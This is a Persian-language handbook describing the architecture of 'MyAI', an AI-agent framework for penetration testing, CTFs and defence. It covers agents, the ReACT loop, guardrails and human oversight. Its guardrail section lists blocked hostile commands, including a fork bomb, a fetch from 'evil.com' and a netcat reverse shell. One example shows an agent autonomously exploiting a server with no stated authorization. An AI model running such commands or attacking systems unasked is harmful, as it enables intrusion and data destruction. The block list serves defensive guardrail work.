کتابچه معماری MyAI
راهنمای جامع معماری و نحوه کار با هوش مصنوعی امنیت سایبری
نویسنده: Ramin Farajpour Cami
October 2025

📚 فهرست مطالب

۱. مقدمه - MyAI چیست؟

🎯 تعریف MyAI
MyAI یک فریمورک هوش مصنوعی متن‌باز برای امنیت سایبری است که به متخصصان امنیت کمک می‌کند تا عامل‌های هوش مصنوعی تخصصی برای کشف آسیب‌پذیری، بهره‌برداری، ارزیابی امنیتی و دفاع در برابر تهدیدات بسازند و مستقر کنند.

ویژگی‌های کلیدی

💡 چرا MyAI؟
  • امکان پشتیبانی از مدل هوش مصنوعی (OpenAI, Anthropic, DeepSeek, Ollama)
  • ابزارهای امنیتی آماده برای شناسایی، بهره‌برداری و افزایش دسترسی
  • معماری مبتنی بر عامل (Agent-based Architecture)
  • محافظت در برابر حملات Prompt Injection
  • قابلیت ردیابی و مانیتورینگ با OpenTelemetry
  • طراحی سبک و قابل توسعه
🔍 موارد استفاده
• تست نفوذ: کشف خودکار آسیب‌پذیری‌ها و بهره‌برداری
• مسابقات CTF: حل چالش‌های امنیتی به صورت خودکار
• Bug Bounty: شناسایی و گزارش آسیب‌پذیری‌ها
• Red Team: شبیه‌سازی حملات و ارزیابی دفاع
• Blue Team: شکار تهدید و پاسخ به حوادث
• آموزش: یادگیری امنیت سایبری با کمک هوش مصنوعی

۲. مفاهیم پایه

🤖 Agent (عامل)
عامل یک سیستم هوشمند است که با محیط خود تعامل می‌کند. در MyAI، عامل‌ها از مدل‌های زبانی بزرگ (LLM) برای تصمیم‌گیری استفاده می‌کنند و با استفاده از ابزارها (Tools) اقدامات امنیتی را انجام می‌دهند.
🔧 Tools (ابزارها)
ابزارها قابلیت‌هایی هستند که عامل‌ها می‌توانند از آن‌ها استفاده کنند. مثل nmap برای اسکن شبکه، curl برای درخواست‌های HTTP، یا ابزارهای سفارشی برای کارهای تخصصی.
🔄 Handoffs (انتقال وظیفه)
زمانی که یک عامل نیاز به تخصص خاصی دارد، می‌تواند کار را به عامل دیگری واگذار کند. مثلاً عامل اصلی کار رمزنگاری را به عامل تخصصی Crypto واگذار می‌کند.
🛡️ Guardrails (محافظ‌ها)
لایه‌های امنیتی که از اجرای دستورات خطرناک جلوگیری می‌کنند و در برابر حملات Prompt Injection محافظت می‌کنند.
👤 HITL (Human-in-the-Loop)
امکان مداخله انسان در هر لحظه از اجرا. با فشار Ctrl+C می‌توانید عامل را متوقف کرده، وضعیت را بررسی کنید و راهنمایی ارائه دهید.
🔁 Interaction vs Turn
Interaction: یک چرخه کامل فکر کردن (Reason) و عمل کردن (Act) توسط عامل
Turn: مجموعه‌ای از Interaction ها که تا رسیدن به هدف ادامه می‌یابد

۳. معماری سیستم

نمای کلی معماری

معماری MyAI بر اساس هشت ستون اصلی بنا شده است که با هم یک سیستم کامل و قدرتمند برای امنیت سایبری می‌سازند.

🏗️ معماری کلی سیستم
شما (کاربر) ↓ ┌───────────────────┐ │ MyAI Framework │ ← شما دستور می‌دهید └───────────────────┘ ↓ ┌───────────────────┐ │ AI Agent │ ← هوش مصنوعی فکر می‌کند └───────────────────┘ ↓ ┌───────────────────┐ │ Tools │ ← ابزارها اجرا می‌شوند │ (nmap, curl) │ └───────────────────┘ ↓ ┌───────────────────┐ │ Target System │ ← سیستم هدف بررسی می‌شود └───────────────────┘
توضیح جریان:
  1. کاربر دستور امنیتی را وارد می‌کند
  2. MyAI Framework دستور را دریافت و پردازش می‌کند
  3. Agent با استفاده از LLM تصمیم می‌گیرد
  4. ابزارهای لازم اجرا می‌شوند
  5. سیستم هدف بررسی شده و نتایج برمی‌گردد
🔷 هشت ستون اصلی MyAI
┌───────────────┐ ┌───────────┐ │ HITL │◄─────────►│ Turns │ │ (Human-in-the │ │ │ │ Loop) │ │ │ └───────┬───────┘ └───────────┘ │ ▼ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌───────────┐ │ Patterns │◄─────►│ Handoffs │◄─────►│ Agents │◄────►│ LLMs │ │ │ │ │ │ (ReACT) │ │ │ └───────────┘ └─────┬─────┘ └─────┬─────┘ └───────────┘ │ │ │ ▼ ┌────────────┐ ┌────┴──────┐ ┌───────────┐ ┌────────────┐ │ Extensions │◄─────►│ Tracing │ │ Tools │◄───►│ Guardrails │ │ (MCP) │ │ (Phoenix) │ │ │ │ │ └────────────┘ └───────────┘ └───────────┘ └────────────┘ │ ┌─────────────┬─────┴────┬─────────────┐ ▼ ▼ ▼ ▼ ┌───────────┐┌───────────┐┌────────────┐┌───────────┐ │ LinuxCmd ││ WebSearch ││ Code ││ SSHTunnel │ └───────────┘└───────────┘└────────────┘└───────────┘
🎯 ستون‌های اصلی
  • Agents: مغز سیستم - تصمیم‌گیری با LLM
  • Tools: دست و پای سیستم - اجرای عملیات
  • Handoffs: انتقال کار به عامل‌های تخصصی
  • Patterns: الگوهای هماهنگی بین عامل‌ها
  • Turns: چرخه‌های اجرا و تصمیم‌گیری
  • Tracing: ردیابی و مانیتورینگ عملیات
  • Guardrails: امنیت و جلوگیری از خطرات
  • HITL: کنترل و نظارت انسانی

۴. عامل‌های هوش مصنوعی (Agents)

🧠 Agent چیست؟
عامل یک سیستم هوشمند است که محیط خود را از طریق حسگرها درک می‌کند، درباره اهداف خود استدلال می‌کند و با استفاده از عملگرها بر محیط تأثیر می‌گذارد. در امنیت سایبری، عامل‌ها از رابط‌های شبکه به عنوان حسگر و از دستورات امنیتی به عنوان عملگر استفاده می‌کنند.

ساختار یک Agent

📦 اجزای یک Agent
┌─────────────────────────────────────────────────────────────┐ │ Agent Structure │ ├─────────────────────────────────────────────────────────────┤ │ │ │ ┌────────────────────────────────────────────────────┐ │ │ │ Agent Configuration │ │ │ ├────────────────────────────────────────────────────┤ │ │ │ • Name: Agent identifier │ │ │ │ • Instructions: System prompt │ │ │ │ • Model: LLM configuration │ │ │ │ • Tools: Available capabilities │ │ │ │ • Handoffs: Sub-agent delegation │ │ │ │ • Context: State & dependencies │ │ │ └────────────────────────────────────────────────────┘ │ │ │ │ ┌────────────────────────────────────────────────────┐ │ │ │ ReACT Pattern Implementation │ │ │ ├────────────────────────────────────────────────────┤ │ │ │ │ │ │ │ 1. REASON: LLM analyzes situation │ │ │ │ ↓ │ │ │ │ 2. ACT: Execute tools (0 to N) │ │ │ │ ↓ │ │ │ │ 3. OBSERVE: Collect results │ │ │ │ ↓ │ │ │ │ 4. ITERATE: Repeat until goal achieved │ │ │ │ │ │ │ └────────────────────────────────────────────────────┘ │ │ │ └──────────────────────────────────────────────────────────────┘
توضیح اجزا:
  • Name: شناسه منحصر به فرد عامل
  • Instructions: دستورالعمل‌های سیستمی (System Prompt)
  • Model: مدل LLM مورد استفاده (GPT-4, Claude, etc.)
  • Tools: ابزارهایی که عامل می‌تواند استفاده کند
  • Handoffs: عامل‌های فرعی که می‌توان کار را به آن‌ها واگذار کرد

۵. الگوی ReACT

🔄 ReACT چیست؟
ReACT مخفف Reasoning and Action است. این الگو نحوه کار عامل‌های هوش مصنوعی را مشخص می‌کند: ابتدا فکر کن (Reason)، سپس عمل کن (Act)، نتیجه را مشاهده کن (Observe) و این چرخه را تکرار کن تا به هدف برسی.
🔁 چرخه ReACT
┌─────────────────────────────────────────────────────────────────────┐ │ Agent Execution Flow (ReACT) │ └─────────────────────────────────────────────────────────────────────┘ ┌──────────────┐ │ User Input │ │ (Task) │ └──────┬───────┘ │ ▼ ┌───────────────────────┐ │ Input Guardrails │ │ (Prompt Injection │ │ Detection) │ └───────────┬───────────┘ │ ▼ ╔═══════════════════════════════════════════════╗ ║ INTERACTION LOOP ║ ╠═══════════════════════════════════════════════╣ ║ ║ ║ ┌──────────────────────────────────────┐ ║ ║ │ 1. REASON (LLM Inference) │ ║ ║ │ • Analyze current state │ ║ ║ │ • Plan next action │ ║ ║ │ • Select tools or handoff │ ║ ║ └──────────────┬───────────────────────┘ ║ ║ │ ║ ║ ▼ ║ ║ ┌──────────────────────────────────────┐ ║ ║ │ 2. ACT (Tool Execution) │ ║ ║ │ • Execute 0-N tools │ ║ ║ │ • Run commands │ ║ ║ │ • Gather information │ ║ ║ │ • Or delegate to sub-agent │ ║ ║ └──────────────┬───────────────────────┘ ║ ║ │ ║ ║ ▼ ║ ║ ┌──────────────────────────────────────┐ ║ ║ │ 3. OBSERVE (Result Collection) │ ║ ║ │ • Collect tool outputs │ ║ ║ │ • Update context │ ║ ║ │ • Validate results │ ║ ║ └──────────────┬───────────────────────┘ ║ ║ │ ║ ║ ▼ ║ ║ ┌──────────────────────────────────────┐ ║ ║ │ 4. DECIDE │ ║ ║ │ Goal achieved? ───Yes──► Exit │ ║ ║ │ │ │ ║ ║ │ No │ ║ ║ │ │ │ ║ ║ │ └──► Loop back to REASON │ ║ ║ └──────────────────────────────────────┘ ║ ║ ║ ╚═══════════════════════════════════════════════╝ │ ▼ ┌───────────────────────┐ │ Output Guardrails │ │ (Command Validation) │ └───────────┬───────────┘ │ ▼ ┌──────────────┐ │ Result │ │ (Output) │ └──────────────┘
💡 مثال واقعی: اسکن یک سیستم
دستور: "IP این سیستم را اسکن کن: 192.168.1.100"

چرخه 1:
  REASON:   "باید اول ببینم سیستم زنده است یا نه"
  ACT:      ping 192.168.1.100 را اجرا می‌کند
  OBSERVE:  "سیستم زنده است!"

چرخه 2:
  REASON:   "حالا باید پورت‌های باز را پیدا کنم"
  ACT:      nmap -p- 192.168.1.100 را اجرا می‌کند
  OBSERVE:  "پورت 22, 80, 443 باز است"

چرخه 3:
  REASON:   "باید سرویس‌های روی این پورت‌ها را شناسایی کنم"
  ACT:      nmap -sV 192.168.1.100 را اجرا می‌کند
  OBSERVE:  "SSH, HTTP, HTTPS یافت شد"

هدف حاصل شد ✓

۶. الگوهای چند عامله

در سیستم‌های پیچیده، چندین عامل با هم کار می‌کنند. الگوهای مختلفی برای هماهنگی بین عامل‌ها وجود دارد.

۱. الگوی سلسله مراتبی (Hierarchical)

┌─────────────────┐ │ Lead Agent │ ← رئیس تیم │ (مدیر) │ └────────┬────────┘ │ تصمیم می‌گیرد چه کسی کار کند │ ┌──────────────────┼──────────────────┐ ↓ ↓ ↓ ┌───────────────┐ ┌───────────────┐ ┌───────────────┐ │ Network Agent │ │ Crypto Agent │ │ Web Agent │ │ (شبکه) │ │ (رمزنگاری) │ │ (وب) │ └───────────────┘ └───────────────┘ └───────────────┘
مثال: عامل اصلی تشخیص می‌دهد چالش مربوط به رمزنگاری است و کار را به Crypto Agent واگذار می‌کند.

۲. الگوی زنجیره‌ای (Chain)

Agent 1 Agent 2 Agent 3 Agent 4 (اسکن) ───► (تحلیل) ───► (حمله) ───► (گزارش)
مثال: عامل اول اسکن می‌کند، دوم تحلیل می‌کند، سوم حمله می‌کند و چهارم گزارش می‌نویسد.

۳. الگوی موازی (Parallel)

┌─────────────────┐ │ Coordinator │ └────────┬────────┘ │ ┌──────────────────┼──────────────────┐ ↓ ↓ ↓ ┌───────────────┐ ┌───────────────┐ ┌───────────────┐ │ Agent A │ │ Agent B │ │ Agent C │ │ اسکن IP 1 │ │ اسکن IP 2 │ │ اسکن IP 3 │ └───────┬───────┘ └───────┬───────┘ └───────┬───────┘ │ │ │ └──────────────────┼──────────────────┘ ↓ نتایج جمع می‌شود
مزیت: سه برابر سریع‌تر! همه عامل‌ها همزمان کار می‌کنند.

۷. امنیت و Guardrails

🛡️ چرا Guardrails لازم است؟
سیستم‌های هوش مصنوعی می‌توانند هدف حملات Prompt Injection قرار بگیرند یا دستورات خطرناکی تولید کنند. Guardrails از سیستم در برابر این تهدیدات محافظت می‌کند.
🔒 سیستم چند لایه Guardrails
دستور کاربر ↓ ┌─────────────────────────────────────┐ │ Guardrail 1: بررسی ورودی │ │ ✓ آیا دستور خطرناک است؟ │ │ ✓ آیا prompt injection است؟ │ │ ✓ آیا کد مخرب دارد؟ │ └──────────┬──────────────────────────┘ ↓ ✓ امن است ┌─────────────────────────────────────┐ │ Agent کار می‌کند │ └──────────┬──────────────────────────┘ ↓ ┌─────────────────────────────────────┐ │ Guardrail 2: بررسی خروجی │ │ ✓ آیا دستور خطرناک تولید شده؟ │ │ ✓ آیا reverse shell است؟ │ │ ✓ آیا داده حساس لو می‌رود؟ │ └──────────┬──────────────────────────┘ ↓ ✓ امن است نتیجه به کاربر
⚠️ دستورات خطرناک که مسدود می‌شوند
  • rm -rf / (حذف کل سیستم)
  • :(){ :|:& };: (fork bomb)
  • curl http://evil.com/shell (دانلود shell مخرب)
  • nc -e /bin/bash attacker (reverse shell)

Human-in-the-Loop (HITL)

Agent مشغول کار است... ↓ ┌─────────────┐ │ Agent │ ← در حال اسکن... │ در حال کار │ └─────────────┘ ↓ شما Ctrl+C می‌زنید! ↓ ┌─────────────┐ │ توقف! │ │ │ └─────────────┘ ↓ ┌──────────────────────────────┐ │ شما می‌توانید: │ │ • وضعیت را ببینید │ │ • دستور جدید بدهید │ │ • مسیر را تغییر دهید │ │ • ادامه دهید یا متوقف کنید │ └──────────────────────────────┘
اهمیت HITL: کنترل کامل در دست شماست. می‌توانید در هر لحظه مداخله کنید، اشتباهات را تصحیح کنید و راهنمایی ارائه دهید.

۸. ابزارها و قابلیت‌ها

ابزارها بر اساس زنجیره حمله امنیتی (Security Kill Chain) دسته‌بندی شده‌اند.

🔧 ابزارها بر اساس مرحله حمله
1️⃣ شناسایی (Reconnaissance) ┌──────────────────────────────┐ │ • nmap → اسکن شبکه │ │ • netcat → بررسی پورت │ │ • curl → بررسی وب │ │ • shodan → جستجوی اینترنت │ │ • crypto → رمزنگاری │ └──────────────────────────────┘ 2️⃣ حمله (Exploitation) ┌──────────────────────────────┐ │ • exploit tools │ │ • webshell │ │ • code execution │ └──────────────────────────────┘ 3️⃣ افزایش دسترسی (Privilege Escalation) ┌──────────────────────────────┐ │ • sudo exploits │ │ • kernel exploits │ │ • suid binaries │ └──────────────────────────────┘ 4️⃣ حرکت جانبی (Lateral Movement) ┌──────────────────────────────┐ │ • SSH tunneling │ │ • credential reuse │ │ • network pivoting │ └──────────────────────────────┘ 5️⃣ استخراج داده (Data Exfiltration) ┌──────────────────────────────┐ │ • file transfer │ │ • data extraction │ └──────────────────────────────┘ 6️⃣ کنترل (Command & Control) ┌──────────────────────────────┐ │ • remote access │ │ • persistence │ └──────────────────────────────┘
🌟 ویژگی‌های ابزارها
  • قابل سفارشی‌سازی: می‌توانید ابزار خود را بسازید
  • مدولار: هر ابزار مستقل از دیگری کار می‌کند
  • ایمن: تحت نظارت Guardrails اجرا می‌شوند
  • قابل ترکیب: ابزارها را می‌توان با هم ترکیب کرد

۹. مثال‌های کاربردی

🎯 مثال ۱: حل چالش CTF
شما: "این چالش CTF را حل کن"

MyAI:
  Step 1: بررسی فایل چالش
  Step 2: شناسایی نوع چالش (crypto, web, forensics, ...)
  Step 3: انتخاب Agent مناسب
  Step 4: اجرای ابزارهای مربوطه
  Step 5: پیدا کردن flag
  Step 6: تأیید صحت flag

نتیجه: FLAG{example_flag_here}
🔍 مثال ۲: تست نفوذ سرور
شما: "سرور 192.168.1.100 را تست کن"

MyAI:
  Interaction 1: ping → سرور زنده است
  Interaction 2: nmap → پورت‌های 22, 80, 443 باز
  Interaction 3: service detection → SSH, HTTP, HTTPS
  Interaction 4: vulnerability scan → OpenSSH 7.4 (قدیمی)
  Interaction 5: exploit search → CVE-2018-XXXX پیدا شد
  Interaction 6: exploit attempt → موفق!

نتیجه: دسترسی به سرور حاصل شد
🌐 مثال ۳: تحلیل وب‌سایت
شما: "وب‌سایت example.com را بررسی کن"

MyAI:
  Interaction 1: DNS lookup → IP address
  Interaction 2: Port scan → Open ports
  Interaction 3: HTTP headers → Server info
  Interaction 4: Directory scan → Hidden paths
  Interaction 5: Vulnerability scan → Security issues
  Interaction 6: Report generation → Full report

نتیجه: گزارش کامل امنیتی

جریان کامل یک Task

📋 مثال کامل: اسکن وب‌سایت
مرحله 1: شما دستور می‌دهید ┌────────────────────────────────┐ │ MyAI> این وب‌سایت را اسکن کن: │ │ https://example.com │ └────────────────┬───────────────┘ ↓ مرحله 2: Guardrail بررسی می‌کند ┌────────────────────────────────┐ │ ✓ دستور امن است │ │ ✓ هیچ کد مخربی نیست │ └────────────────┬───────────────┘ ↓ مرحله 3: Agent انتخاب می‌شود ┌────────────────────────────────┐ │ Red Team Agent انتخاب شد │ └────────────────┬───────────────┘ ↓ مرحله 4: Agent شروع به کار می‌کند (ReACT) ┌────────────────────────────────┐ │ Interaction 1: │ │ REASON: باید اول DNS را چک کنم│ │ ACT: nslookup example.com │ │ OBSERVE: IP = 93.184.216.34 │ └────────────────┬───────────────┘ ↓ ┌────────────────────────────────┐ │ Interaction 2: │ │ REASON: حالا پورت‌ها را اسکن │ │ ACT: nmap 93.184.216.34 │ │ OBSERVE: پورت 80, 443 باز │ └────────────────┬───────────────┘ ↓ ┌────────────────────────────────┐ │ Interaction 3: │ │ REASON: باید headerها را ببینم│ │ ACT: curl -I example.com │ │ OBSERVE: Apache 2.4, PHP 7.4 │ └────────────────┬───────────────┘ ↓ مرحله 5: Guardrail خروجی را بررسی می‌کند ┌────────────────────────────────┐ │ ✓ هیچ دستور خطرناکی نیست │ └────────────────┬───────────────┘ ↓ مرحله 6: نتیجه به شما نمایش داده می‌شود ┌────────────────────────────────┐ │ گزارش کامل: │ │ • IP: 93.184.216.34 │ │ • پورت‌های باز: 80, 443 │ │ • سرور: Apache 2.4 │ │ • آسیب‌پذیری‌های یافت شده: │ │ - Directory listing enabled │ │ - Old PHP version │ └────────────────────────────────┘

🚀 چگونه شروع کنیم؟

📦 نصب MyAI
# نصب MyAI
pip install myai-framework

# تنظیم API Key
echo 'OPENAI_API_KEY="sk-your-key"' > .env

# اجرا
myai

# شروع کار
MyAI> این سیستم را اسکن کن: 192.168.1.100
💡 نکات کلیدی
  • Agent = مغز: فکر می‌کند و تصمیم می‌گیرد
  • Tools = دست و پا: کارها را انجام می‌دهند
  • Guardrails = ایمنی: از خطرات جلوگیری می‌کند
  • HITL = کنترل: شما همیشه کنترل دارید
  • ReACT = چرخه کاری: فکر → عمل → مشاهده → تکرار

🎓 پایان کتابچه

این کتابچه راهنمای جامعی برای درک معماری و نحوه کار MyAI بود.
برای اطلاعات بیشتر به مستندات کامل مراجعه کنید.

نویسنده: Ramin Farajpour Cami
October 2025